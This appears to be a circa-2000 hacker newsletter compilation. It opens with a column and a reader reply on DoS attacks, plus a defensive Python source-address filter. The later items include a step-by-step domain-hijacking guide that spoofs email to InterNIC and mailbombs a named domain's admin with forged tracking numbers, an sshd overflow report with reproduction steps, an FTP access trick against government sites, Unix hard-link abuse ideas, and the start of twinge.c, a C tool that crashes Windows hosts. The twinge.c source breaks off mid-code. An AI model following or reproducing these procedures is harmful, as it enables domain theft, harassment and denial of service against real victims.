The real question about the "denial of service" (DoS) attacks on major Web sites this week is: Just who are these jerks, anyway?

It could be virtually anyone. Except for non-jerks. You have to be a jerk to pull this kind of stunt.

It seems to be nothing but a prank. There is no political ideology, no monetary gain, no anger against the sites being attacked. There is just the thrill of having done it and knowing that all those important newscasters on television are talking about something you did. Gee, aren't you special?

If it were political or a protest against particular sites or e-commerce in general, there should be some sort of manifesto, someone claiming credit. The point of a terrorist attack is to let people know why you did it, in an attempt to change something you don't like. But in this case, no one is claiming credit or telling us why it's happening.

Further, although there are certainly unscrupulous people who would attack a site in order to make money -- say, short a stock before the attack -- usually such a person would be smart enough to keep a low profile. When a lot of prominent sites are attacked at once, investors realize this is an anomaly and not a problem unique to the company being attacked. The stocks of these companies did not decline as much as some observers thought they might.

That's why the main speculation seems to be that this is being done by adolescents (in mind if not in body). "The people who have done this in the last couple days are amateurs," says Alex Samonte, chief engineer at SiteSmith, a company that helps build Web sites. "It appears to be just for the fun of it." Samonte has a lot of experience on this issue, as someone who has been building Web sites for a long time. He did some of the work on the original Yahoo site.

We should distinguish between these amateurs (or "jerks") and that underground computer community that calls itself "hackers."
The hacker communities are really pissed off right now, because every television news program in the universe is talking about the "hacker attacks." Hackers like to figure out how systems work. They like to find obscure weaknesses that can be exploited. The more difficult, the better. There is status in being able to do something sophisticated. And many of them try to demonstrate their power by showing it off in some relatively harmless way, posting an obscene message, say, rather than shutting down a site.

Most hackers do not consider DoS attacks to be true hacking. You can do it automatically, using one of several rogue programs available on the Internet. (One early program, still popular, is called Smurf, although there are a lot more sophisticated programs these days.) Using such a program makes this kind of attack a simple process that we used to call "cookbooking" in chemistry lab. You don't have to know how it works, just follow the directions and you get the reaction you want. The problem in this case is that we don't know what reaction the attackers want.

Hacker news sites are complaining. On 2600: The Hacker Quarterly, for example, writers say they're insulted to be linked to these attacks by implication. The site's editors do concede, however, that the attackers have a reasonable knowledge of Internet topology.

(Suggestion to the hacker community: Find a new name for yourself. The term "hacker" has been co-opted by the press to mean any computer attacker, malicious or not. The public's definition of the word is different than yours. You can't change that now.)

The reason these attacks are so disturbing is that it could be some 14-year-old jerk doing it. And some of the recent attacks could be done by copycats, an even more despicable breed of jerk, because they don't even show any originality. And it's not that I agree with hackers who may be trying to prove a point or make a statement, but the randomness of these attacks is clearly worse.
The world is moving toward e-commerce, and it can be halted by some pimply-faced kid who doesn't have a life. Isn't that a pleasant image of the information revolution?

When I was in college at a really geeky school called Harvey Mudd College, there were lots of phone phreaks and geeks who liked to show that they could make free calls off the college president's phone line with their homemade blue boxes. I'd hang out with them sometimes and get a giggle out of doing something naughty. But then I grew up.

The current attacks demonstrate the double-edged sword of any new technology. The Web empowers the individual to do great things. It can also amplify his or her tendency to be a jerk and hurt a lot of people. With every new privilege comes a new responsibility, and these folks are irresponsible. They don't deserve access to the Web, but we don't know how to deny them service, unless they are caught.

Apparently, that will be difficult to do. It is not difficult to disguise yourself, or make it appear that you are operating from a different address. It's called spoofing. According to Samonte of Sitesmith.com, in order to trace the attack back to the origin, you have to do it while the attack is occurring, probably tracing back through several different servers, ISPs and network providers -- with their cooperation. But the people operating the target sites are too busy putting out fires, trying to get their sites back up, to spend time doing the tracing.

Here's another difficult problem: DoS attacks use innocent computers to do the attacking. They do not exploit security problems in the target sites, they attack security problems in other computers on the Internet. They get other computers -- and it could be your home computer with a DSL connection -- to send hundreds of messages to the target site. Enlist enough of those computers and you can overwhelm a site with too much traffic.
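[Ed: Brandt makes two points above that belong together: the attacker forges the source address ("spoofing"), and the flood is sent from other people's machines. The one party that can tell a forged source from a real one is the provider that connects each of those machines, because it assigned the addresses on that link. The following is an added example, not code from the column, from SiteSmith or from any provider: a model of that customer-edge filter, with constructed link names, address blocks and packets. Routers do the same job with an ingress access list or a strict unicast reverse-path check.]

```python
"""
Source-address validation at a provider's customer edge, as an added,
constructed example.  The provider knows which address blocks it assigned
to each customer link; a packet arriving on a link with a source address
outside that customer's blocks cannot legitimately have come from that
customer and is dropped before it reaches the rest of the Internet.
"""
import ipaddress
from collections import Counter
from dataclasses import dataclass

# Constructed provisioning table: customer link -> prefixes assigned to it.
ASSIGNED_PREFIXES = {
    "cust-a": [ipaddress.ip_network("203.0.113.0/25")],
    "cust-b": [ipaddress.ip_network("198.51.100.0/24"),
               ipaddress.ip_network("203.0.113.128/25")],
}


@dataclass(frozen=True)
class Packet:
    iface: str   # customer link the packet arrived on
    src: str     # source address as written in the IP header (sender-chosen)
    dst: str     # destination address


def source_is_valid(pkt, table=ASSIGNED_PREFIXES):
    """True only if pkt.src lies inside a prefix assigned to pkt.iface."""
    try:
        src = ipaddress.ip_address(pkt.src)
    except ValueError:
        return False                 # unparsable header: never forward it
    prefixes = table.get(pkt.iface)
    if not prefixes:
        return False                 # link with no assignment: fail closed
    return any(src in net for net in prefixes)


def filter_packets(pkts, table=ASSIGNED_PREFIXES):
    """Split a packet list into (forwarded, dropped) as the edge filter would."""
    forwarded, dropped = [], []
    for p in pkts:
        (forwarded if source_is_valid(p, table) else dropped).append(p)
    return forwarded, dropped


def drops_per_link(dropped):
    """Count drops per customer link; links that appear here are emitting
    traffic with forged sources and deserve an operator's attention."""
    return dict(Counter(p.iface for p in dropped))


# Constructed sample traffic, all aimed at one destination address.
SAMPLE = [
    Packet("cust-a", "203.0.113.10", "192.0.2.80"),   # inside cust-a's /25: forwarded
    Packet("cust-a", "198.51.100.7", "192.0.2.80"),   # cust-b's address on cust-a's link: dropped
    Packet("cust-a", "10.0.0.1", "192.0.2.80"),       # private source on a customer link: dropped
    Packet("cust-b", "203.0.113.200", "192.0.2.80"),  # inside cust-b's second block: forwarded
    Packet("cust-b", "203.0.113.5", "192.0.2.80"),    # cust-a's address on cust-b's link: dropped
    Packet("cust-c", "203.0.113.6", "192.0.2.80"),    # link not in the table: dropped
    Packet("cust-a", "not-an-ip", "192.0.2.80"),      # malformed header: dropped
]

if __name__ == "__main__":
    fwd, drp = filter_packets(SAMPLE)
    print(f"forwarded {len(fwd)}, dropped {len(drp)}")
    print("drops per link:", drops_per_link(drp))
```

The table is keyed by link, not by a global list of "good" addresses, which is what makes the check cheap: each packet is compared against the handful of blocks on the link it arrived on. Brandt's caveat that assignments change daily is why a real deployment feeds this from the provisioning database rather than a hand-kept list.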
Therefore, companies that can best prevent such attacks are the Network Service Providers or Internet Service Providers, not the target Web sites themselves. The ISPs know all the network addresses that should be routing signals through their services. These spoofed messages would have strange IP addresses on them. So theoretically, the ISPs could block any messages with the wrong address.

But they may have thousands of legitimate addresses to keep track of, and those change every day as new clients join up and old ones drop off. It is not that trivial or cheap, and the ISPs themselves have nothing to gain by it. They would only do it to prevent another company from being attacked. In other words, "What's my motivation?" To be nice? Government subsidies might do the trick, but we know how bad government subsidies are. Right?

Longer term, there are solutions. Major sites need to distribute their servers and add as much redundancy as possible. That will make it harder for the attackers to find and target all their servers, increasing the odds that the site will keep running. But that's not an overnight job.

But in the meantime, this is a perfect example of the difficulty of putting a powerful tool in the hands of the people: Some people are jerks.

ISN is sponsored by Security-Focus.COM

A response follows;

Hi William,

You raised a few interesting points in your previous mail. I would like to add to a couple with my own, if I may.

* 2600, "The Hacker Quarterly", can in no way act disgusted by these attacks and hold insult for being linked to them. When I was a teenager, sitting around with an all powerful 96 modem (speed!) the magazine was a good read.
Informative, and fun. Now however, it panders to nothing more than the scr1p7 k1d33. Disseminating information is one thing - tell me how to propagate an attack in rough technical terms, and I would be able to work it out, probably learning a lot on the way. It is doubtful that I would take the attack beyond my own network and my friends, though. However, 2600 is guilty of providing source code directly and/or direct links in several cases. This is not passing the information under the ideal of "free speech". This is passing the gun to a teenage idiot with a seriously bad attitude.

Thanks, I got that one off my chest - it's been bugging me for a while now! :-)

>Here's another difficult problem: DoS attacks use innocent computers
>to do the attacking.

* Innocent is in one way correct, William, but in another I think not. DoS attacks are older than my cleanest pair of socks, and this particular type is not new. The information pertaining to it, and ensuring that your system is not amongst those compromised, is freely and easily available. Steps should have been taken by now to ensure that your machine is not one of those used. Whether it be a home box or not - people need to act in a responsible way. You would lock your guns in a cabinet, rather than leave them outside on the window ledge, wouldn't you?

What I'm saying is that security is only as good as the next weak machine, and we should not tolerate weak machines. I was discussing on the FreeBSD mailing list with a chap recently these things, after Yahoo! was had. The best way would be to have machines removed from the backbone - how is that done? The only other option we could come up with was along your lines. Perhaps, we thought, we could start a list dedicated to nothing more than recording the IP addresses of machines used to propagate such attacks. Provide some tools to automate things as much as possible, and sysadmin now has a list of IP addresses that they can drop at the border.
We then mail the blocked sites to let them know what is happening. In this way we could take some responsibility that the people who should be taking it don't seem to want - we could reduce the size of the playing field for the morons out there. OK, so the problem doesn't go away, but it is a step in the right direction, don't you think?

>But in the meantime, this is a perfect example of the difficulty of
>putting a powerful tool in the hands of the people: Some people are
>jerks.

Couldn't have put it any better!

Regards,

Johnathan Meehan

"A jug of wine,
A leg of lamb
And thou!
Beside me,
Whistling in the darkness."

"Be Ye Not Lost Among Precepts of Order..." - The Book of Uterus 1;5

ISN is sponsored by Security-Focus.COM

@HWA

158.0 Hellvisory #001 - Domain Name Jacking HOW-TO by Lucifer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From vuln-dev mailing list

__________________________________________________________________________________
Domain Name Robbery (aka Domain-Jacking): A Flaw in InterNIC Authentication Scheme
----------------------------------------------------------------------------------

By Lucifer Mirza (lucifermirza@hotmail.com)

___________
Disclaimer:
-----------

The sole purpose of the information contained in this advisory is to point out the flaws in InterNIC's domain name handling system and is intended for education. Any abuse of the information in whole or in part is NOT my responsibility nor do I encourage illegal activities.

The below mentioned technique involves a planned step by step way of stealing different sorts of com/net/org/gov/mil domain names.

______
Tools:
------

* anonymous remailer or mail bomber which could spoof email addresses (I used Kaboom).
* access to internet and mainly networksolutions.com website.
* Social Engineering skills for timing the emails.
* A fake email address at hotmail.com or any other free service.
_____________
Instructions:
-------------

As an example for this advisory, I will take the domain name wi2000.org. Go to networksolutions.com and click on the link that says 'Who Is.' Now enter the domain name (wi2000.org in this case) in the search field and click on the 'Search' button. This would show you the WhoIs information as shown below:

___________________________________________________________
Registrant:
WI2000 (WI24-DOM)
Blixered 1
Goteborg, Lila Edet 46394
SE

Domain Name: WI2000.ORG

Administrative Contact:
MICKE, ANDERSSON (AMM367) HACKEDINDUSTRIES@HOTMAIL.COM
545326-3445 (FAX) 545326-3445
Technical Contact, Zone Contact:
Jason, Berresford (BJE41) jasonb@MOUNTAINCABLE.NET
1-(905)-765-5212
Billing Contact:
MICKE, ANDERSSON (AMM367) HACKEDINDUSTRIES@HOTMAIL.COM
545326-3445 (FAX) 545326-3445

Record last updated on 22-Jan-2000.
Record created on 19-Dec-1999.
Database last updated on 3-Feb-2000 14:29:53 EST.

Domain servers in listed order:
NS1.CAN-HOST.COM 24.215.1.6
NS2.MOUNTAINCABLE.NET 24.215.0.12
____________________________________________________________

Now you have two choices here:

-01> Either you could take full control of the domain by changing the Administrator's handle information.
OR
-02> You could simply point the domain to another host and let it recover in time by itself.

The first approach is very aggressive and could be hazardous if you are going for gov or mil domain names, so I recommend the second approach for gov and mil domains.

___________________________
Initiating the First Attack:
---------------------------

Let me first explain the InterNIC authentication system in case most of you would be the readers who do not have their own domain names. The problem with InterNIC authentication is that they do NOT send a confirmation email if the request is sent from the same email as the person owning the contact or the domain name itself! Therefore, utilizing this flaw one could spoof anyone's email address and change any domain name's information.
Although a confirmation is required from the person to whom the domain is about to be transferred, that shouldn't be too hard as it would be your own email address ;-)

Here's a step by step procedure:

- Go to http://www.networksolutions.com/
- Click on the link that says 'Make Changes.'
- Enter the domain name wi2000.org
- You should be presented with 2 blue buttons - Click on the one that says *Expert*
- Next screen would have a heading 'Select the form that meets your needs'
- Click on the link that says 'Contact Form'
- Next you should see a form with 2 fields.
- In the first field enter the admin's handle (wi2000.org admin is AMM367)
- In the next field enter his/her email address (in this case it's HACKEDINDUSTRIES@HOTMAIL.COM)
- Change the option to 'Modify.'
- Now 'Proceed to Contact Information.'
- Select the MAIL-FROM option and click the 'Go on to Contact Data Information.'
- Now you should see all the information about the admin contact of the domain name!
- In the E-mail address field change the email to your own fake email. (I changed it to dd@doom.com)
- Now 'Proceed to Set Authorization Scheme.'
- Again choose MAIL-FROM and enter the email address of the admin (HACKEDINDUSTRIES@HOTMAIL.COM)
- Leave the bottom option at 'No' and 'Generate Contact Form.'
- Now you should see a template with all the information. Similar to this:

______________________________________________________________________________
******************* Please DO NOT REMOVE Version Number **********************
Contact Version Number: 1.0
**************** Please see attached detailed instructions *******************

Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:

Contact Information
1a. NIC Handle..............: AMM367
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: MICKE, ANDERSSON
1d. Organization Name.......: WI2000
1e. Street Address..........: BLIXERED 1
1f. City....................: GOTEBORG
1g. State...................: LILLA EDET
1h. Postal Code.............: 46394
1i. Country.................: SE
1j. Phone Number............: 545326-3445
1k. Fax Number..............: 545326-3445
1l. E-Mailbox...............: dd@doom.com

Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE

Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: HACKEDINDUSTRIES@HOTMAIL.COM
3c. Public (Y/N)............: NO
________________________________________________________________________________

_____
NOTE: Do NOT press the button at the bottom that says 'Mail this contact form to me!'
-----

Copy and paste this message into your anonymous remailer or mailbomber and you are ready to go; but WAIT! It's not that easy, now comes the HARD part! When you mail this message to hostmaster@networksolutions.com a message similar to the following would be sent to the admin email address:

____________________________________
Subject: [NIC-000128.4r50] Your Mail
__________________________________________________________________________

This is an automatic reply to acknowledge that your message has been received by hostmaster@networksolutions.com. This acknowledgement is "NOT" a confirmation that your request has been processed. You will be notified when it has been completed.

If you should have need to correspond with us regarding this request, please include the tracking number [NIC-000128.4r50] in the subject. The easiest way to do this is simply to reply to this message.
If you have not already done so, please come and visit our site via www browser or ftp and pick-up the latest domain template or review the Domain Name Registration Service Agreement at the URLs:

Domain Name Registration Service Agreement
http://www.networksolutions.com/legal/service-agreement.html

Domain Name Registration Template
ftp://www.networksolutions.com/templates/domain-template.txt

Regards,
Network Solutions Registration Services

***********************************************
IMPORTANT INFORMATION
***********************************************

On January 15, 2000, Network Solutions introduced Service Agreement, Version 6.0. All versions of the Service Agreement template will continue to be accepted and processed until January 31, 2000. On and after February 1, 2000, please use the Network Solutions Service Agreement, Version 6.0 template located at ftp://www.networksolutions.com/templates/domain-template.txt for all template requests. The terms and conditions of the Service Agreement are available on our Web site at http://www.networksolutions.com/legal/service-agreement.html.

************************************************

The zone files, which make the Internet work, are normally updated twice daily, 7 days a week at 5:00 AM and 5:00 PM U.S. Eastern Standard Time. Requests that are completed before these times will be included in that 12-hour zone file update and will normally begin to take effect within 5-6 hours.

Should you wish to modify or delete an existing domain name registration, you can do so online, using our Service Agreement. You can change the registrant's address, replace a contact/agent with a different contact/agent, or change primary and/or secondary name server information.

To update information about an existing contact, such as postal address, e-mail address or telephone number, complete and submit the Contact Form to hostmaster@internic.net.
This form is available on our Web site at www.networksolutions.com

To register or update information about a name server, complete and submit the Host Form to hostmaster@internic.net. This form is also available on our Web site.

Network Solutions Registration Services
e-mail: help@networksolutions.com
_______________________________________________________________________

You should now be thinking that this message could get you in trouble, but there is a way of getting rid of this trouble. Here you'll use your mailbomber to mailbomb the guy with 20-30 similar messages if you want your attack to be successful. The person would see 35 messages from the same address and therefore would delete all of them and you'd probably be safe. If he 'would' email someone then he would probably reply to the wrong tracking number. In the above case, the tracking number is [NIC-000128.4r50].

OK, here's another hard part. You have to open your notepad and generate similar numbers, actually come up with them. You should NEVER mailbomb the person with the same tracking number. What I mean is that you should never send more than one email to him from [NIC-000128.4r50]; in the next email, change the [NIC-000128.4r50] to [NIC-000127.5089] or something different. Here is a list of some numbers that I generated just to give you a good idea of how the scheme works.

[NIC-000127.5089]
[NIC-000128.4rg7]
[NIC-000128.523f]
[NIC-000127.53d0]
[NIC-000129.r609]
[NIC-000128.3f6y]
[NIC-000128.5d8t]
[NIC-000127.r509]
[NIC-000128.4r30]
[NIC-000127.d307]

_____
NOTE: Remember to change the number at both places. In the subject as well as the email body!
-----

In the case of wi2000.org you will send the email messages to HACKEDINDUSTRIES@HOTMAIL.COM from hostmaster@internic.net. The message subject and body are already described above. Stop after you have mailed him/her 10-15 messages!
Now it's time to email hostmaster@networksolutions.com with our fake email as HACKEDINDUSTRIES@HOTMAIL.COM. So again, in this case the message will be sent to hostmaster@networksolutions.com from HACKEDINDUSTRIES@HOTMAIL.COM with the following template that we created above:

______________________________________________________________________________
******************* Please DO NOT REMOVE Version Number **********************
Contact Version Number: 1.0
**************** Please see attached detailed instructions *******************

Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:

Contact Information
1a. NIC Handle..............: AMM367
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: MICKE, ANDERSSON
1d. Organization Name.......: WI2000
1e. Street Address..........: BLIXERED 1
1f. City....................: GOTEBORG
1g. State...................: LILLA EDET
1h. Postal Code.............: 46394
1i. Country.................: SE
1j. Phone Number............: 545326-3445
1k. Fax Number..............: 545326-3445
1l. E-Mailbox...............: dd@doom.com

Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE

Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: HACKEDINDUSTRIES@HOTMAIL.COM
3c. Public (Y/N)............: NO
________________________________________________________________________________

_____
NOTE: Do NOT put anything in the Subject! Just send one email! Do NOT bomb hostmaster@networksolutions.com with more than one email!!
-----

That's pretty much it. Now continue to bomb HACKEDINDUSTRIES@HOTMAIL.COM, changing the tracking number every time until your 30-35 tracking numbers are used up! Now all you gotta do is WAIT. After 24 hours you could go and change the domain information and no one would be there to stop you because now you are the admin of the domain name!
_____
NOTE: This attack will only work on domains that have an admin contact different from their technical contact!
-----

____________________________
Initiating the Second Attack:
----------------------------

This attack will be successful even if the technical and admin contact are the same, but the admin of the contact needs to be kind of stupid to disregard emails from InterNIC as he is also the technical contact; but this method should work as it has worked for me.

The procedure is basically the same apart from the fact that this time:

- Go to http://www.networksolutions.com/
- Click on the link that says 'Make Changes.'
- Enter the domain name wi2000.org
- You should be presented with 2 blue buttons - Click on the one that says *Expert*
- Next screen would have a heading 'Select the form that meets your needs'
- Click on the link that says 'Service Agreement.'
- Now when it asks for email address, enter your own.
- Now you should see many fields, don't panic!
- Go to the technical contact and change the handle to freeservers, hypermart etc.
- Now come to 'Nameserver Information.'
- Change the nameservers to hypermart or freeserver nameservers.
- If there's anything in the 'Optional Information' after that then simply delete them.
- Click on the button 'Submit this form for processing.'
- You are done, the form will be emailed to your email address.
- When the form arrives in your email, then simply take this part:

___________________________________________________________________________________
**** PLEASE DO NOT REMOVE Version Number or any of the information below when submitting this template to hostmaster@networksolutions.com. *****
Domain Version Number: 5.0
********* Email completed agreement to hostmaster@networksolutions.com *********

AGREEMENT TO BE BOUND.
By applying for a Network Solutions' service(s) through our online application process or by applying for and registering a domain name as part of our e-mail template application process or by using the service(s) provided by Network Solutions under the Service Agreement, Version 5.0, you acknowledge that you have read and agree to be bound by all terms and conditions of this Agreement and any pertinent rules or policies that are or may be published by Network Solutions. Please find the Network Solutions Service Agreement, Version 5.0 located at the URL http://www.networksolutions.com/legal/service-agreement.html. [ URL ftp://www.networksolutions.com ] [11/99]

Authorization
0a. (N)ew (M)odify (D)elete.........: M
Name Registration
0b. Auth Scheme.....................: MAIL-FROM
0c. Auth Info.......................:
1. Comments........................:
2. Complete Domain Name............: wi2000.org
Organization Using Domain Name
3a. Organization Name................: WI2000
3b. Street Address..................: Blixered 1
3c. City............................: Goteborg
3d. State...........................: Lila Edet
3e. Postal Code.....................: 46394
3f. Country.........................: SE
Administrative Contact
4a. NIC Handle (if known)...........: AMM367
4b. (I)ndividual (R)ole?............: Individual
4c. Name (Last, First)..............:
4d. Organization Name...............:
4e. Street Address..................:
4f. City............................:
4g. State...........................:
4h. Postal Code.....................:
4i. Country.........................:
4j. Phone Number....................:
4k. Fax Number......................:
4l. E-Mailbox.......................:
Technical Contact
5a. NIC Handle (if known)...........: BJE41
5b. (I)ndividual (R)ole?............: Individual
5c. Name(Last, First)...............:
5d. Organization Name...............:
5e. Street Address..................:
5f. City............................:
5g. State...........................:
5h. Postal Code.....................:
5i. Country.........................:
5j. Phone Number....................:
5k. Fax Number......................:
5l. E-Mailbox.......................:
Billing Contact
6a. NIC Handle (if known)...........: AMM367
6b. (I)ndividual (R)ole?............: Individual
6c. Name (Last, First)..............:
6d. Organization Name...............:
6e. Street Address..................:
6f. City............................:
6g. State...........................:
6h. Postal Code.....................:
6i. Country.........................:
6j. Phone Number....................:
6k. Fax Number......................:
6l. E-Mailbox.......................:
Prime Name Server
7a. Primary Server Hostname.........: NS1.CAN-HOST.COM
7b. Primary Server Netaddress.......: 24.215.1.6
Secondary Name Server(s)
8a. Secondary Server Hostname.......: NS2.MOUNTAINCABLE.NET
8b. Secondary Server Netaddress.....: 24.215.0.12
END OF AGREEMENT
For instructions, please refer to: "http://www.networksolutions.com/help/inst-mod.html"
____________________________________________________________________________________

- Now launch your anonymous remailer or mailbomber.
- From: the domain admin (HACKEDINDUSTRIES@HOTMAIL.COM in this case).
- To: hostmaster@networksolutions.com
- Subject: (do not enter any subject, leave the field blank!)
- Body: the template you created above.
- You are ready to go, but before you send this email to InterNIC, remember to bomb HACKEDINDUSTRIES@HOTMAIL.COM with similar emails but different tracking numbers as we did in the first procedure.
- After sending 10-20 emails, send the above template to InterNIC.
- Continue bombing your 40 messages. Remember to generate 40-50 tracking numbers.
- This is basically it.
- The domain would be transferred to freeservers or hypermart and then you could simply activate it from there on your own email address. Remember to use a fake email.

________________________
Nameservers and Handles:
------------------------

Freeservers
Technical Handle: FS4394
Primary Nameserver: NS3.FREESERVERS.COM
Primary Nameserver IP Address: 209.210.67.153
Secondary Nameserver: NS4.FREESERVERS.COM
Secondary Nameserver IP Address: 209.210.67.154

Hypermart
Technical Handle: DA3706-ORG
Primary Nameserver: NS1.HYPERMART.NET
Primary Nameserver IP Address: 206.253.222.65
Secondary Nameserver: NS2.HYPERMART.NET
Secondary Nameserver IP Address: 206.253.222.66

_______________
Possible Fixes:
---------------

As you have seen, InterNIC does not use the tracking number system too efficiently. Possible fixes would certainly be a confirmation email to the admin contact 'with' a tracking number. NOT the email saying 'Your request is being processed' but a confirmation email which would ask, 'Do you agree with this request?' even if it has been sent from the same email address as the admin's! Tracking numbers could be easily generated and the attacks I have mentioned above aren't too hard for a script kiddie with a canned bomber.
@HWA

159.0 SSHD Buffer overflow exploit (FreeBSD)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.freebsd.org/cgi/query-pr.cgi?pr=14749

Problem Report ports/14749
/usr/ports/security/ssh/ has remote buffer-overflow

Confidential    no
Severity        serious
Priority        medium
Responsible     freebsd-ports@FreeBSD.org
State           closed
Class           sw-bug
Submitter-Id    current-users
Arrival-Date    Sat Nov 6 11:40:00 PST 1999
Closed-Date     Sat Nov 20 16:27:49 PST 1999
Last-Modified   Sat Nov 20 16:27:49 PST 1999
Originator      N/A <N/A@FreeBSD.ORG>
Release         RELENG3
Organization    N/A

Environment
FreeBSD XXXXXX 3.3-STABLE FreeBSD 3.3-STABLE #6: Thu Sep 30 20:23:42 PDT 1999 root@XXXXXXX:/usr/src/sys/compile/GARLIC i386

Description
There appears to be an exploitable buffer-overrun in the SSH 1.2.27 version in ports, with the RSAREF implementation. SSH 1.2.27 is seemingly no longer supported. It goes like that... sshd.c, do_connection at line 1513 gets a long number from the remote side. It proceeds to pass it into rsa_private_decrypt. rsa_private_decrypt (in rsaglue.c) has a ~200 byte buffer which can be overflowed, giving a SIGBUS or SIG 11. It might take some talent to overflow this because of the conversions.

How-To-Repeat
In ssh-1.2.27, modify your sshconnect.c, do_login, change every instance of SSH_SESSION_KEY_LENGTH to SSH_SESSION_KEY_LENGTH+500, and comment out the call to a_public_encrypt (otherwise, you'd crash yourself). A true exploit would probably only encrypt some of the buffer, leaving the rest to cause problems.

Fix
don't use static buffers here, or do a simple bounds check.

Audit-Trail
State-Changed-From-To: open->closed
State-Changed-By: cpiazza
State-Changed-When: Sat Nov 20 16:27:08 PST 1999
State-Changed-Why: patch-ax, committed by imp@freebsd.org, fixes this problem.

@HWA

160.0 Mozilla curiosity
~~~~~~~~~~~~~~~~~

Interesting msg found on vuln-dev list...
From: Roy Wilson <emperor@squonk.net>
To: <VULN-DEV@SECURITYFOCUS.COM>
Sent: Wednesday, December 01, 1999 8:02 AM
Subject: Idiocy "exploit"

I don't know if this is really suitable for this list, it's more of a "pay attention to what you're doing, dummy" "exploit".

I was cruising a .GOV site the other day with GetRight in Browse mode (an enhanced FTP client, it appears), while walking a client through the directories he needed to traverse to find the file he wanted (a database). We were getting different file counts - his Netscape would show 7 files, GR on my end would show 28. After about two hours of messing around trying to find out what was going on, we finally found it. He had Netscape set to the default "Mozilla@" for anon login password. If I set GR to any email address other than the one I was using the first time around, I only saw the seven files as well. The other 21 files were the raw data the cgi script used to build sorted db's for HTML display.

The email address that showed all data? fraud@irs.gov

Being the curious person that I am, I started hitting state level sites as well as federal. About a third of them showed more files with the fraud@ than with mozilla@.

-=-

Follow up info:

Some FTP-servers can be configured to let anonymous FTP-users that supply a non-RFC822 compliant e-mail address as their password access a restricted FTP-area.

Roy: Try whatever@ and Mozilla@whatever and see what happens.

...

@HWA

161.0 Any user can make hard links in Unix
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From vuln-dev list
From: Benjamin Elijah Griffin <bgriffin@CDDB.COM>
To: <VULN-DEV@SECURITYFOCUS.COM>
Sent: Tuesday, December 21, 1999 9:36 PM
Subject: any user can make hard links in Unix

I've talked with some people about it and found only one person who knew about this and no one who could offer a good reason for it. So perhaps awareness should be increased and OSs patched. I've tested this out on SunOS 4.1; RedHat 6.0 (Linux 2.2.5-15); BSDI BSD/OS 4.0; and NetBSD 1.4.1. Probably lots more do it.

Basically any user can make a hard link to any file IF
A) the user knows the file exists
B) has enough access to cd into the directory it is in
C) has write access to any directory on the same volume

What does this gain you?
1) If the user has read access to the writable directory, s/he can now stat the inode even if the original location did not offer read access.
2) The user can change the ctime of the inode (fun with tripwire).
3) Some suid programs that just checked for sym-links can perhaps be duped into opening or writing to files they shouldn't.
4) Social hacks involving 'chown -R' or the like.
5) Screw with the quota of other users and other ways to make it hard to delete files that should be deleted (eg large logs in /var)

Possibly other things.

Thanks to Alexis Rosen for his input on this.

Benjamin

@HWA

162.0 Crash windows boxes on local net (twinge.c)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BUGTRAQ Post
From: <sinkhole@NILL.NET> To: <BUGTRAQ@SECURITYFOCUS.COM> Sent: Thursday, February 10, 2000 1:36 PM Subject: crash windows boxes on your local network (twinge.c) Hi Everyone. I've had this sitting on my hard drive for awhile but it still works, so I figured it was time to see this get fixed. Crashes almost any windows box on your local network. Compiles on Linux. If you can't figure it out you shouldn't be using it anyways. =) -sinkhole -- BEGIN twinge.c -- /* twinge.c - by sinkhole@dos.org [6/99] this cycle through all the possible icmp types and subtypes and send to target host, 1 cycle == 1 run thru all of em Crashes almost all Windows boxes over a LAN. DISCLAIMER: This is a PoC (Proof Of Concept) program for educational purposes only. Using this program on public networks where other people are affected by your actions is _HIGHLY ILLEGAL_ and is not what this is made for. for without help from ryan this wouldnt have been coded. =) */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> long counter=1; void usage(const char *progname, const char *user) { fprintf(stderr, "twinge.c by sinkhole@dos.org - licensed for use by %s\n", user); fprintf(stderr, "This is a PoC (Proof of Concept) program for educational uses.\n"); fprintf(stderr, "usage: %s <dest> <cycles [0 == continuous]>\n", progname); } int resolver(const char *name, unsigned int port, struct sockaddr_in *addr ) { struct hostent *host; memset(addr,0,sizeof(struct sockaddr_in)); addr->sin_family = AF_INET; addr->sin_addr.s_addr = inet_addr(name); if (addr->sin_addr.s_addr == -1) { if (( host = gethostbyname(name) ) == NULL ) { fprintf(stderr,"ERROR: Unable to resolve host %s\n",name); return(-1); } addr->sin_family = host->h_addrtype; memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length); } addr->sin_port = htons(port); return(0); 
